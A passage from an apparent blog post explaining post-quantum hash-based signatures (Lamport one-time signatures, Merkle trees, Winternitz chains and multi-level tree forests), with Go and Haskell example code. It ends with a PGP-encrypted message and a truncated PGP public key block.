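	if err != nil {
		fmt.Println("error:", err)
		return
	}
	sig := sign(priv, []byte("hello"))
	fmt.Println(verify(pub, []byte("hello"), sig), verify(pub, []byte("goodbye"), sig))
}
```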

In order to allow signing multiple messages there's one easy solution: just have multiple one-time signatures! Let's say that we want a thousand. The issue is that the public and private keys of our one-time scheme were 512×32 bytes = 16KB and, if we want a thousand of them, then the public and private keys end up being 16MB, which is quite a lot. We can solve the private key size by generating a stream of values from a cipher with just a 32-byte seed key, but the large public key remains.
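
Shrinking the private key to a seed might look like the following sketch. The choice of AES-256 in counter mode as the cipher is an assumption made for this example, as is the deriveSecrets name; any good stream cipher or PRF would do. The all-zero IV is only acceptable because a given seed is used for exactly one keystream.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"fmt"
)

// deriveSecrets (hypothetical) expands a 32-byte seed into count 32-byte
// secret values by taking consecutive chunks of an AES-256-CTR keystream.
func deriveSecrets(seed [32]byte, count int) ([][32]byte, error) {
	block, err := aes.NewCipher(seed[:])
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize) // fixed, all-zero IV: see the note above
	stream := cipher.NewCTR(block, iv)
	out := make([][32]byte, count)
	for i := range out {
		// XORing the keystream into zero bytes yields the raw keystream.
		stream.XORKeyStream(out[i][:], out[i][:])
	}
	return out, nil
}

func main() {
	var seed [32]byte
	copy(seed[:], "an example seed, not a real one!")
	secrets, err := deriveSecrets(seed, 512)
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Println(len(secrets), "values of", len(secrets[0]), "bytes from a 32-byte seed")
}
```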

The solution to this is to use a Merkle hash tree, introduced (unsurprisingly) by Merkle, in 1979.

In the diagram above, four leaf hashes are included in the hash tree: A, B, C and D. The hash tree is a binary tree where each non-leaf node contains the hash of its children. If Bob believes that H(H(AB)H(CD)) is Alice's public key, then anyone can convince him that A is part of Alice's public key by giving him A, B and H(CD). Bob calculates H(AB) from A and B, and then H(H(AB)H(CD)) from H(AB) and H(CD). If the values match, and if the hash function isn't broken, then A must be part of Alice's public key.
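
Bob's check for the four-leaf example can be sketched as below. The names are invented for the example, and the leaf values are just hashes of the strings "A" to "D" standing in for real leaf hashes. Each step of the path carries the sibling hash plus a flag saying which side it sits on, since the order of concatenation matters.

```go
package main

import (
	"crypto/sha256"
	"fmt"
)

type hash = [32]byte

// leafHash stands in for a real leaf value in this example.
func leafHash(s string) hash {
	return sha256.Sum256([]byte(s))
}

// node hashes the concatenation of two children.
func node(left, right hash) hash {
	return sha256.Sum256(append(left[:], right[:]...))
}

// step is one sibling on the way from a leaf up to the root.
type step struct {
	sibling hash
	onLeft  bool // true if the sibling is the left-hand child
}

// verifyPath recomputes the root from a leaf and its siblings and compares
// it with the root that the verifier already trusts.
func verifyPath(root, leaf hash, path []step) bool {
	h := leaf
	for _, s := range path {
		if s.onLeft {
			h = node(s.sibling, h)
		} else {
			h = node(h, s.sibling)
		}
	}
	return h == root
}

func main() {
	a, b, c, d := leafHash("A"), leafHash("B"), leafHash("C"), leafHash("D")
	root := node(node(a, b), node(c, d))
	// To show that A is in the tree, supply B and H(CD).
	ok := verifyPath(root, a, []step{{b, false}, {node(c, d), false}})
	fmt.Println(ok)
}
```

The proof is one hash per level, so it grows with the height of the tree rather than with the number of leaves.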

Now, if A, B, C and D were one-time signature public keys then Alice's public key has been reduced to a single hash. Each signature now needs to include the one-time signature value, the rest of the one-time public key, and also a proof that the one-time public key is in Alice's public key. In more detail, the signature contains either x_i or y_i depending on the bits of the hash of the message to be signed and also H(x_i) or H(y_i) for the bits that weren't used. With that information, Bob can reconstruct the one-time signature public key. Then the signature contains the path up the tree - i.e. the values B, and H(CD) in our example, which convince Bob that the one-time signature public key is part of Alice's overall public key.

So now the public and private keys have been reduced to just 32 bytes (at least if you're using a 256-bit hash). We can make the tree arbitrarily large, thus supporting arbitrarily many signatures. The signatures, however, are 16KB plus change, which is pretty chunky. So the next trick will try to address this, and it's thanks to Winternitz.

The Winternitz trick was described in Merkle's original, 1979 work and it involves iterating hashes. We started off by considering the one-time signature of a single bit and solved it by publishing H(x) and H(y) and then revealing one of the preimages. What if we generated a single random value, z, and published H(H(z))? We would reveal H(z) if the bit was one, or z if the bit was zero. But an attacker could take our signature of zero (z) and calculate H(z), thus creating a signature of one.

So we need a checksum to make sure that, for any other message, the hash function needs to be broken. So we would need two of these structures and then we would sign 01 or 10. That way, one of the hash chains needs to be broken in order to calculate the signature of a different message. The second bit is the Winternitz checksum.

As it stands, Winternitz's trick hasn't achieved anything - we're still publishing two hash values and revealing two secrets. But when we start signing larger messages it becomes valuable.

Let's say that the Winternitz hash chains were 16 values long. That means that one of them can cover four bits of the hash that we're signing. If we were signing a 256-bit value, then we only need 64 Winternitz chains and three for the checksum. Also, the Winternitz scheme makes it easy for the verifier to calculate the original public key. The signature size has gone from 16KB to 2,144 bytes. Not bad!
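
Here is a sketch of a Winternitz one-time signature with those parameters. It follows the description above rather than any particular paper, and a couple of details are my own assumptions for the example: the public value of each chain is the secret hashed 15 times (so a digit of 15 reveals the public value itself), and the checksum is the sum of 15 minus each digit, written as three base-16 digits.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

const (
	chainLen  = 16 // values per chain, so each chain covers four bits
	msgChains = 64 // 256 bits at four bits per chain
	sumChains = 3  // the checksum is at most 64*15 = 960, which is < 16^3
	chains    = msgChains + sumChains
)

// iterate applies SHA-256 to v, n times.
func iterate(v [32]byte, n int) [32]byte {
	for ; n > 0; n-- {
		v = sha256.Sum256(v[:])
	}
	return v
}

// digits splits H(msg) into 64 four-bit digits and appends the checksum.
// Raising any message digit lowers the checksum, so a forger always has to
// walk at least one chain backwards.
func digits(msg []byte) [chains]int {
	digest := sha256.Sum256(msg)
	var d [chains]int
	sum := 0
	for i := 0; i < msgChains; i++ {
		if i%2 == 0 {
			d[i] = int(digest[i/2] >> 4)
		} else {
			d[i] = int(digest[i/2] & 15)
		}
		sum += chainLen - 1 - d[i]
	}
	for i := 0; i < sumChains; i++ {
		d[msgChains+i] = (sum >> uint(4*(sumChains-1-i))) & 15
	}
	return d
}

func generate() (priv, pub [chains][32]byte, err error) {
	for i := range priv {
		if _, err = rand.Read(priv[i][:]); err != nil {
			return
		}
		pub[i] = iterate(priv[i], chainLen-1)
	}
	return
}

// sign walks each chain forward by the value of its digit.
func sign(priv [chains][32]byte, msg []byte) (sig [chains][32]byte) {
	for i, d := range digits(msg) {
		sig[i] = iterate(priv[i], d)
	}
	return
}

// verify finishes each chain and compares the result with the public key.
func verify(pub [chains][32]byte, msg []byte, sig [chains][32]byte) bool {
	for i, d := range digits(msg) {
		if iterate(sig[i], chainLen-1-d) != pub[i] {
			return false
		}
	}
	return true
}

func main() {
	priv, pub, err := generate()
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	sig := sign(priv, []byte("hello"))
	fmt.Println(len(sig)*32, "byte signature, valid:", verify(pub, []byte("hello"), sig))
}
```

Because the verifier ends up recomputing every public value, the signature doesn't need to carry the unused half of the public key as the earlier scheme did.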

But! There's still a critical flaw in this! Recall that using a one-time signature twice completely breaks the system. Because of that, the signature scheme is “stateful”. This means that, when signing, the signer absolutely must record that a one-time key has been used so that they never use it again. If the private key was copied onto another computer and used there, then the whole system is broken.

That limitation might be ok in some situations, and actually means that one can build forward-secure signature schemes: schemes where signatures prior to a key compromise can still be trusted. Perhaps for a CA where the key is in an HSM that might be useful. However, for most environments it's a huge foot-cannon.

We could pick one-time public keys to use based on the hash of the message, or at random in the hope of never colliding but, in order for such schemes to be safe the tree of one-time public keys needs to be really big. Big as in, more than 2^128 entries. If we use the trick of generating the private keys from the output of a cipher then, as soon as we fix the cipher private key, we have determined the whole tree. However, although we can compute any part of it, we can't compute all of it. At least not without an infinite amount of time (or close enough to infinite as makes no difference).

So we have to defer calculating parts of the tree until we actually need them in order to generate a signature. In order to defer bits of the tree, we have to split the tree up into a forest of smaller trees. The top-level tree is calculated as before and the Merkle hash of it is the public key. But rather than sign a message with the one-time leaves of that tree, we sign the root hash of a subtree. Since everything is deterministic, the subtree at any position is always the same so we're always signing the same message - which is safe.

Thus, if we wished to have a conceptual hash tree with 2^160 leaves, we could split it up, say, every 16 bits. The tip of the tree would be a hash tree with 2^16 leaves. Those leaves would sign the root of a hash tree of another 2^16 leaves and so on. In order to make 2^160, we would need 10 layers of such trees.

I can't have an image with all 2^16 leaves in each tree, so 2^2 will have to do. When generating the key, only the top (blue) tree needs to be calculated. When generating each signature, all the subtrees down the path to the final one-time key need to be calculated. So the signature consists of a one-time signature, from the 3rd leaf of the blue tree, of the root of the red tree (as well as a Merkle path to the blue root), plus a one-time signature, from the 1st leaf of the red tree, of the root of the green tree (as well as a Merkle path to the red root), etc.

Obviously these signatures are going to be rather larger, due to all the intermediate signatures, and will take rather longer to calculate, due to calculating all the subtrees on the fly. Below is a little Haskell program that tries to estimate signature size vs signature time. It may well have some bugs because I haven't actually coded up a working example to ensure that it does actually work.

log2 = logBase 2 :: Double -> Double

-- We assume SHA-256 for the sake of this example.
hashBits = 256
hashBytes = hashBits/8
-- This is the Winternitz parameter.
w = 64
wBits = log2 w
-- These are parameters for the Winternitz signature.
l1 = fromIntegral $ ceiling (hashBits/wBits)
l2 = 1 + (fromIntegral $ floor $ log2(l1*(w-1))/wBits)
-- wWords is the number of hash chains that we'll have.
wWords = l1 + l2

-- An SSE2, SHA-256 implementation can hash at 5 cycles/byte
hashCyclesPerByte = 5
-- We assume that we can generate keystream bytes at 2 cycles/byte.
secretCyclesPerByte = 2

otsSignatureBytes = wWords * hashBytes
-- In order to generate a single OTS public key we need to calculate wWords
-- hash chains to a depth of w hashes.
otsHashOps = wWords * w
otsHashBytes = hashBytes * otsHashOps
otsHashCycles = hashCyclesPerByte * otsHashBytes
-- In order to generate the private key, we need to generate this many bytes of
-- key stream.
otsPrivateBytes = wWords * hashBytes
otsPublicBytes = otsPrivateBytes
otsPrivateCycles = secretCyclesPerByte * otsPrivateBytes

-- This is the height of a tree.
treeHeight = 8
-- To calculate the public keys for a whole tree we have to generate 2^treeHeight public keys.
treePublicKeyGenCycles = (otsPrivateCycles + otsHashCycles) * 2**treeHeight
-- To calculate the hash of the root of the tree, we first need to hash all the
-- public keys.
treePublicKeyHashCycles = otsPublicBytes * hashCyclesPerByte * 2**treeHeight
-- Then we need to hash all the hashes
treeMerkleCycles = 2**(treeHeight-1) * hashBytes * hashCyclesPerByte
treeSignatureCycles = treePublicKeyGenCycles + treePublicKeyHashCycles + treeMerkleCycles
-- As part of the signature we need to publish the OTS signature and a path up
-- the Merkle tree. The signature is the same size as a public key because the
-- Winternitz hash chains are just slightly shorter.
treeSignatureBytes = otsPublicBytes + treeHeight*hashBytes

logKeys = 160
forestHeight = fromIntegral $ ceiling (logKeys/treeHeight)
forestSignatureBytes = forestHeight * treeSignatureBytes
forestSignatureCycles = forestHeight * treeSignatureCycles
forestSignatureTime = forestSignatureCycles / 2.9e9

The Haskell code assumes that one can calculate SHA-256 at 5 cycles/byte, which is possible for concurrent hashing as is needed in this case. There are several parameters that one can play with: the Winternitz value, the size of the trees (which is assumed to be uniform here) and the size of the forest. I've taken the size of the forest to be 2^160, although that only allows 2^16 signatures before the probability of a collision reaches 2^-128. However, the overall security of the scheme is somewhat less than 128 bits because there are multiple hashes to attack concurrently.

With the parameters that I picked above, the estimated, lower-bound time for signing is 0.8 seconds (on a 2.9GHz machine) and the signatures are 34KB. The algorithm is embarrassingly parallel, so multi-core machines can cut the signing time down a lot, but the size is more difficult to improve. Changing the parameters to achieve a 20KB signature results in a signing time of nearly 30 seconds! (And it's a lower-bound of the signing time - in the real world there will be additional overhead.)

So, should everyone be using hash-based, PGP signatures now? Well, probably not, at least not for a subkey: PGP clearsigned messages would look silly with 34KB of base64-encoded noise at the bottom. Perhaps for a long-term signing key if you really want. But, over the long-term, it's generally confidentiality (i.e. encryption) that you need to maintain and I haven't talked about post-quantum encryption at all in this post. (Maybe in the future.)

But for problems like software updates, a reasonable case can be made. The size of the signature is generally trivial compared to the size of the message and software really does last for decades now. Hash-based signatures allow you to forget about any cryptographic breakthroughs to the greatest degree possible.

There's lots more to hash-based signatures than I've covered here:

  • GMSS treats the forest construction as an optimisation problem and solves for several cases.
  • W-OTS+ builds on several, previous papers and changes the hash property needed from collision resistance to second preimage resistance, which is huge for classical machines! It means that the size of the hash can be halved. However, quantum computers can do a pre-image in 2^(n/2) time, the same amount of time that classical computers can do a collision, so it doesn't help you there. (Can quantum computers do a collision in 2^(n/3) time? djb says don't worry.)
  • If you don't mind keeping state, then XMSS is probably the most recent work exploring that problem that I'm aware of. (Although one might want to combine it with W-OTS+.)
  • Tahoe-LAFS has some notes on hash-based signatures, notably some from Daira Hopwood.

And those messages for anyone in possession of a large, quantum computer:

-----BEGIN PGP MESSAGE-----
Version: GnuPG/MacGPG2 v2.0.19 (Darwin)
Comment: GPGTools - http://gpgtools.org

hQIMA1tQlAt53r41ARAAsCwY0VverVliy5i29NafjAEhFpmwDDAHVdzOYtnGbOHL
Hi1t1hgRPe5NBD+AnDENmUbJf4hNxH88Uh4qTqy8ja4qAWyRSJXENijZs2Pjhv+8
ovJhDSDK3N8bGDcM7XS7o1FGrLJtpV2CqP4DP4rSr4fcQz1ZnRWrnBP9XI6FAbEp
XXRtW6mbtPWTLfgvn91Ka3aJGegXl6rFYeqmXgmZiPYrnmNSAgFGSKg+Er2Kz+jE
sl4tS/hqP9vhAAWWCOvT7U5LMuDGjawsBXjHTPA9FokP07euxRPxMraz5FmrtZYb
erFhkMlW5IV5zG1BEO5TetyM66hAZid/QwdFzlDW3wHQoYJdJWcZEYY0tGWbL3+h
mfgcNX9gwnn0o0fU6xqpn/cApv3uZUkNIFPxQXGzHqrs/Vv215ut8zwLI17G/FIF
McuOAP+Upw4WSVUxw5+UhzRZazW1AO2DaipBou/3IIez0WhXhEB4AIwjdH5ATk7p
MMN2c62LwqLGCpNOMGPub5jQ0lIibH9eIDnPgQ1UR0OHqb/gzIK05mSFQOYCFYSh
48/8PA4WHocoQGGfbBTkIlCU+ExYuMvtNdof/EVVsaw+r2KAsJbI7+OfdTNgNgSR
zqQeSDsc9+6GYXP6EXnGdrtwC94wQl1NxzXjr+C0v4ri+n/i+21fnoAP2qGGmmPS
7AHjSHv3Wc7lUy9ehRp1z35jaZoNE9T5JfKmMtXgv+EGhO2wfuFaeJNyKFuNQ5XQ
Hgko+OnS2YTxGSsLA+J4nHgYPLcnK7WIQCIc7gC9TJIAPfH6nxn7Rz1uz2Amaxg9
sp+LO/5DyN/lTlJONMCvDp565s7vWAq5GYrY+ff/3qsZWfkgaDXhK4ztgl197hns
uwEiw3uBSOo+fQtDyitkO7+W7GgOJJA5oiPJL2F/2oS0lRN+QpClVmgiF+2mpEBn
x8gzgYqIFMZiminCxGeUFhI9CTPNhUq02Pxb/G//4MDyyaAmrswc3YE80+CJ5GQF
6iKh0uxtzOEEOpQrRoH124H8ubpYQF0DwFfEXientJEkQHWCHbsE1V88YYted/44
Ej7teBvl8NktZwMX5RdzjSs2JqJDH4NxEz68lqurGLi8Lhek6Ha3+SL2SlJ55h1x
VuEaWEkWUBe0ja8S4NvjNH0GsL57dTPx2stV0gOrBwEE1l7IWNLhq5f3HSJhicjs
+AYDEBVt3AEHefOB5s0PyktGytvBHL4Y5prP2iF3dbUe3QzLP8CdVBj9vHkhK/XX
hAJrSKJJrR5s9sq930W3+UHXnj+e9cKv7JXkPDwnexF8gF+O5FfmzlZX0+gSFVc5
Sl8CJ1fXcm+SeD6PDCtqGL3w0D7Xx3ZbR3LvnKvnN50CvH9m98I5JrgyJLkDSaYW
laz5MY8G0QsAudSqeOiZudb2dboYKSli8kok85S5ABHYmZ7muvFaw7p2pCKi8HQm
dygj4bA/ZVTt9vnHu2vzXcV7mbmaGzLlbXBr2uEvLyTQ1gQ2/BwWE/XD/mod5Rsf
IJeyGEi3T8Lm1TwKlVtdkxOqskUDQADjz+M6segIbXZxlEyln/aH8sfUpy26CTc6
FXL5XQGhjYdbSW1a5No7bIaeClktfU5mvsD0+XzlzcMzlLZRE/zRsCTc6QN1NA38
0qpYLXc2cKn0ePrURf8Ckp4ZjCswvHBD+OLhfOaefFW/+LMjDIUAc9lkZVzdM8dk
qGYatDG/3kD2n3wuFpb6LUU6mYPBnlYTEPzCeiur6wN54j9Jif0/ccLslqSmxb4r
cmju4FVZU+1N8cS7WewNwrxPULnM656NCDMFZE1zyKOppYaZC5PBSn2UoGLZMhpG
szYD14iYpQXxIs6E3ebkA3wypZCqLpvtDIixSjbtbgu2jI3GmSFBROexpjj08q5E
QeYaAwYPvKit5jGEEY+Mojcu/qjJS1290dsjESTpOzd3dd1lYlhjfTZLOvdrSgyR
UGvyfKL23gc6CNO/qWY1P6lJLhx1HfP7pdUC1VDc8Ku1QFPFDZYIkIrRS/WQ0Ozd
mjrTkVHBqpU7mshL3Nijl8lV7/IqTxkkD0r3Hwo0n1W8J1xdLRpXctSdXdncKLt7
eibzlMaHPMylo8z+43s71q92bT1XyKhyv2yBacts2lvRl4AxpZB4XJi17dMcg7Td
Z4cMPCgAdzQURkQo0EoiWqEroOtokLvdbKLxtHNwMWR+qC0WKHrS6F6/ZZxmoZyi
MhyTdyiDUJAXxblFZKRssrXmd3Fj6Eogduar3EyXKvzHG7Rof8Pr8pH2DlO/2v28
qQHQX0Fv/zvqix1+mRDFkkBDpkgeRsr94X+RTSlg+oUKxPdv0eTRBwgxHln0XkbS
fts7qgBQulSZSr8g3FNkUE8ljUeIWmyy4YQ6fiIq+0to5wUVxfgjY83jCgLXaplO
i8evn8ttlnmIWQCSQLelu+DiXTcWEpSS/D7VPNkIM9B1Ef5cJOC0NCqaP5vhP5e4
9FZG310zO9Gzxxs8rNoKnlbWJgsc6eTHmBL5hFWraVvaDsZjPGn140h8SmPWwg5R
QAaYPc3M0KSG+64T0GWHceh97vkSdHtYLySpblu4s/Bmgd2O5iXGI2ZB0cZmDZ7Z
jtoB4YNnDuc+OmVoJivzTusXLABbqa+7zbgAgiclEkxMEpXagh4ufXOhT9lwp7Kq
P89igEdtKkKUx7LAhjd8mn4rNknPLElA2GjZWyE17aiumVK6a9yx9enkBv9jfSut
ImZXHs5XHqNxlQDSMjuS5/V70qXwZvPdZtYDGDOgll+S+rET+neXOjxoCNDDdZCa
6Ba1t4D/moe6xwkrrMSZ14KGLURJg2iJW85w3hDH3QQZZmcNEg/ZmQogO0v15PzU
XSGhw8DOfw5oLEIBGnxVpQ5Ph9ROMm33YeJGcU62x1uewvYQ+pet5V52O4EJhwPV
DmMMfIVu73zJd1/RetBD49ayuFoalzhydT6kHTS7n+0ajodifo1PPJOjfbjcv7RW
G8cvu+hpgoXVx9qTJQzzX+6gcsQqaPWXfwciBA8Kmcie4uIeYAAhKyzknEnvQqyY
oSnXk6FsE6ZCUyy9w/kgdKwR8si5INjmlGzVuIrAso2hXluq5WkB20jcuARmDTXa
UDA8MXjfCVVSV+X3bPU26tbYHTftDpwBKxvlw0o0Jty2V1kf3jW7sRk5j9UYpXKI
xpsofpc6UL5BO2599jYY22/4NFBIgpcecHq+FwWQ9lJKXnPbnmGs9gRrrJ7iA1S+
l2M32azLnvsNF9ZnOSCudACOpMAAzs9ulnpS2ETRIvQ6pAksTW0ysgb4OyDPEzAO
8k/nzGztIN6XIWu7ahQKU4qxycGPmQvCup/8IQu4RvXMaUGetD+04rwXo9CdFTtt
Nk3WQ1RsIPZXaBgdtD9bvG5S9/a+R2lcOtS+9NbO4RFVzZn/DA59ZvvMVLFc/BGs
eu5X0XKz+T2sQ19D20dDau6pTIJIm0EyJbugIYo+YJKUbhDWk6gDbX+6axxHfT2O
hZRwHzuKobkX51dZ3XPFuOJUqaHVvbv56ydwkSHf0ygCMM/nDOkz7Fxjo+KnuXKu
EQMxAtngBmKzPLZNxXyT2VL79ZZ15SBuMMj++iheTV4nrHx2/+lvfnsVX5xlUjV7
GDMERHxlMAjUHU0Ww2QKMLkdIOJymxytvSk1ZT3M8/B9WkCnAL/4o3FDrHIXRACh
H9z6c/e9imXgqBXnIIdh8Zxx2OR06El6A6FV4dlsoB4xMToKqSpTKFCo9s/1UBoF
BQBPuMYz2geweSv4PDOZXtqFm8nACM7SNk89aIBj6G8AzVfv0L7lWVBUC79BJ7ES
K7fytKl5hMyQLAKjNhguox9y//48M99IGg9vPBkQFrYaQt6UeT8Js+IgEG6SphVW
X0A8y+EqpOsuXe6ip+RAULlum/5dKUdN/Frwx5afE21MNuG4o53setzz3jB+MZly
YHLqjKRCHiIA2UrPqlVA6fZCAqnhWdQ8u+j+VUfDbpNnTgcEC4ID7HZFZw49nU22
AgEqVClhET8YwzFm/PMZV7nXhXimfeoOWZXWCVvwUiwU3k711fOz+PFEj2sOuOjJ
kld5cLtmOHkCrMh0f/MoxOP7d8MudRxc+pN9hdwVhSro4O7jhcA+rOCA2vrxe/nB
3pBUMrZ0xzDRLa2ZMUNBR1e4de6i77XAunF1iNp45XI/3/5uQ4+RqEZIG5RdLtIL
fSVDVvSoLBQGeKeJoz3gpjcC4d7ksCaesEDuMKJN9gE0KZDuiXprOZNZbAxoHBLl
+38tu1p2r2VadMz2hQQure0hiBo1p3P+Lhwh3pQVHW7nIMoFvrtN3FCdLaaryf1P
DnfT9h6tcDkePc6IEqteGhyJSkl8WnLGIrZJzJPS9szQtWYLlU9P9tSJMTKG6xTF
Dk6l9AHPDUz2/hPay+Tn0+NOw0m78rfU09Iy9JpXaiaoHLrWlfxLSx6B2dxV3mJm
0mSZF0x+eNU/tY0l1pGG9vn8E7MuRpYIU/lOqHGeZAyaH6ERAe8yueOl0kW6dFRy
aWAauUBkvpNWql56sc3jpMPAPdGH2ukId7aDQoi1BLrPM4glSKMM5A3WTkHDQ50s
EWkxiZ9JR5Iv4mx4g4VGnZKnpeQLNnnP9AlNRcnmzVS4+WTNEwnR2vLZPLOXt465
EilaxxeOO0+Xny9+oVF1tjCi5cuXZzWmTLVQ9dyOQPj9cv5vtcMm1UIMv8VVDR6p
JVDg4LW0wW4pvBVbD+CyFN48z5Y/bRBa+Pf9JXjYgtpivr+1GAPWReVXdfAGveFm
DiPTxZltSjUSwfp3kBoqpdrFBzOeA5Que3F0CW9Eoy1WyMEzAok+hYXylXnyl8FL
au5nMDMouo7CWpe992LuEli2JWskbW8Fp7Ryov7eSV3JMoveSyjBLcXtaVGk8/yz
reYRxm4IwIzhPhdRkUj04nPkOoEuALWWW+GCjBRJlv2I8Ht2yAINY8Xd0Qj94qSy
KGHj9cyK96HG2zpdvvtH2rI5+ohzj3Pgd/Cz8zrh486VGR1HmWJeQP4xTvmiTrT/
f44UXpmcr58aIPv4jg9bc5kODfLKNn4Fthxh6mR7Tu3V5zC2BWs2Go6YLJ/yXQbm
rxHiHdyr7oukZlMO5AonlYqP4Fa2rDFu/yxO9XEyOtCk/pHTgIhPvQWLH9x7fPZF
WlbP4/T9/F0dnS4YyA39dvaOv0ItoEwRZ4GGtEz7/9boom9cDpqJrpSv6crq4t7H
QPVNWsamwNDBkT1xUAw1cutq2lkXmvYel+uRyk2PmAK35KMYr887L2I85q50leww
a/ILpleonjmlYMWJtpjPjsbMmV7P8vml94hxmN2hsXd1GlvIXgEfISCptGDCdUFL
zvVTgy31KHRnS7ghvZK/0bnRsxZtKeA8wDzK7zXCrQgtS+9uqooXbDbCoVRDVbHD
Fp46G4bYNoiNqNRIYZkUdNeev8yDxYxvdfMXBdwSa7qvn6KLe741QPSZVB8wNcaq
KFbrTtfsJYOEJEWfw9OPL53Vibh0+0KosfIhmFpmbdrhFdWlttlKSEcNoICkOe3Q
wzSWaStynYyXSlBi1l+WwLNNt8Mec9J3iP8jlqYYqRos0wFw+S3OOfVFP4csiWoA
oKlJQK0UchvZdxF6TxdF6xc/Wnd+L7X9lwaijHE9WmvolYwB7/Ki8mgB175YnZp+
hGr0ucMub1nm9w4pbJoYvOx1+ugj8j7ZbHmzDqHZMaNeAPp7y5LO3nv+dpkJViUU
4Rc6m8NMAmhyfaZ5PRqxvXI5oA5z8FubPPjJ8dUQWZ0GTw2HqAVHZS9fq39S5dnI
ExNZEd2ondGp1l7lbOtZ0p7NT50yI9XT0RZhsTb+Ab4RbzW0MYGGN3KfW2jr3kuP
sQCUvo4H8epsVet6jUTj1x4+9sKJOcrfwk0xPKor0aJZKexkMBz/z9CkLhUAeC2p
Kdobeb+SCgolLC4TJPx7KZnKogIIkQTPmLPJ1jj5/yyYOrS36WRPBU9rcnjQpFcc
PGgeBI2ECUs06D5h4v+p0mK3N/S3ChxRF+xRTBRnHE7eyAJLFlswWfxtt/DUsGEt
kMqdUQB8xQ1/DxhF4eMsAcsUHqwKDKCXslVK5jtNfL+nvo5CLWUrlPdzHB5rJRxf
CsSsYNsK2KS8ioB99nJIey/q+84LmNB7dnwJn3bUx/kSXlgHOIM7uA84KR5Q1E7k
Q/4vTSc3ZtFSVWpF58qZ79sAc7UUAeLeGIQkuH/GacQC70Hf5pyht6klYjgw5z26
ehI7wPbFOrjobz88ejgUfgn/yZFLJzuvG+2IKldEs8aBu7W+fz8v3WKUER5ix/j9
bz6FQYTpSyl9ZQmMCyQzPT3D0IODkhX3E/1jtSo/OfAn5NoSpBwXLX9UNW41b4Ve
6id+Yg1E8AwPbJr1pmMuhDJbROmLjUwMqLKu1kLkm5RO9slaG+BMIV4rw8+NFvRb
T52y4rtgmssTGK2x39UGNL+Pn2OXjQF1xogV2YHBgSSuVC2tTkpUzYX+JJiT3SaZ
aA/sfktzCFQe2OHc3tTga//IuziZssPMTRnE8ZM0CLaY/2RPy4yzlpoLUPASQ9Wy
YNgb9d/gx4dilx1n9l8bPd2WQhy0ufTpm2j6qFp7byzPjFWNggKmvtnVXOK6GYVp
slhbl8c4c4d/3+w5GotnDxxYuTkILIZXNoY/9UFsibSduObkX8DgKaaleyK/aLiz
xFGRzWNp8a3h7fuREoavF0lGHJCckjzrQg1y+/spsJPCHTtMIzfXigURZBdYkLF6
LATYXc3BX2jpYubLE5V+ATQJvAWSE4s9q3Tx3b9ZgpPaPKfnvV9TIEJcFgV1j8oy
qCa8hYvaTHdxFbfvcnlmIpppGtC2DbICkoea834VapX9RJM05fQyhTmhOkkgKCN1
5zmcoJg9EQXubK6VpoleptbKOtL9Nx+4RqthxVfZps6qHmZO/xdogLcME4t620UJ
ao8UqWv9xg9i2s0FgfK5l/7LZSfCfJhZb9LjoHsnu3W9SFyJ0KQQQ2LGBv757nuq
/hdYF5IW8NMd4fW7NpgHvT1thQNld1TibzP0wWz3RfIqwWTEm5dPWJlqIqmOjTqp
OzvaqkY28xHxU1Mm5sRokI9MfU9sOR25h+UWliOkrVubV4aJrtbHDtBeil3ZAqGp
2QnVPTuO4gApjIcbR268Po4SIQ3tlxwQvBdc8J9YYW9/4hxPq678wwq1MCgm6ilz
ftGPxCQ81aEpS8U50iyBQLAE6Zpy0U0gPupj5od/ifNQOlaW/MgwyheW+bRsdCKx
OfVmO3MJHXJV3iLK16bXZGFr4qP33wJfAHZqY3LfKwB/NUkF1F8b8NlAQF3CTwyI
PO9rLayeReLBi5mlfOCW7E9RhMIsVL5hjiVUBidxMvWDdn6mY7tfMdzfFm82tvT9
cWd4+8pOtYyL4olDUcbZImTtsxWd3ahOtIxsBMNmL922OoXl6pCjZfnJmeN90Kao
xn0e5Gj7tOLw7j+34KpkbPVYQomdD61XT/QsulnUGf5YhRJr7o36k3mSCUm2n0dh
++wUhec=
=7n2p
-----END PGP MESSAGE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQINBFGaYDoBEAC9PFBixMQKjMPdppekOY/fJLipIWBNPDy4W5caqhXww9EL06Yw
+TeSm2XFwR5quVwdTEsK2JXLiF7jBuyskfp6mmtwA0DV1TXyD2wc3ixlVi4vnMY+
coq+txzMOU1HfMtI1V2k+oTYHH0ImWFa+Hmu1vJwIj19MkXW/6JHHdDaEejQMLfV
zvEPedb0y92pvA2IE43UDcaW9OZO3lc2FrMI0WAueWVpaFD43jNvSx6pyQxfnDQe
XNGsZmXdxkmcpeMO2ZXlH1DqHA71K0seBksAmF4/Z6QR8iooj+O7xJ4dzzY6bxrd
aWmEvgB93nopuHuOZKwS/RgHT1NNPZHoaKpSx/bb0FKkH6fH4q7c+JkSK9+i3MEa
nVUc856vk4uwECAtJkc4Aj7ztG00l0Yx69BasEMdFiqQm6Uu1S15N4ZihIYQUSqg
EJs9pfwjvczDDlZDkBYwyThR6awil9zr6j3aPQ14u24WE5U7pFU7+QD7A7QCMGrP
ieBxXPRyovU7GwUO4dCHghA7QbxBNOiZi+vYbxuPAA9WzszACtcl/DHFhT2ZgcYd
9iCHKGWu3aSBVqlCuBEJLDU7UCTUnK/ob2qWaM/7bXCABr/izkXDTloYRAwCovI8
lKD1pDGu/yOUw4LixhL6QdbH1J10tPGdKalOk9nRYZ7EIvODffCVzjcyfQARAQAB
tCBWZXJheCAoSW5mb3JtZWQgRGVtb2NyYWN5IEZyb250KYkCOAQTAQIAIgUCUZpg
OgIbAwYLCQgHAwIGFQgCCQoLBBYCAwECHgECF4AACgkQHQ2X8ivgvCmBcg/5AfqR
Y1Wg/x4oN4VNcDZ/mQYU3y0mJ4g0Lz69e8MsDB51f/0qiiC99jBXU3Cv5plukf+v
252fAyGn9Njq5y8PWWaPx1wihgBjyWZOGjl4LD/xHPjtHx8cjDEwzCAdHGepeIY1
mvCZr9zFV7GnKEjlgAs4yp11YAhumv71JVF+1e+vhrpohW5XhuePaZ/B5blhJq9F
pHOdIXwVmb4VMh6vp3YMiqT2AOMUQKwq4IGNPZ5dM+mY1YptqJ6WnXviQMyBMJ+5
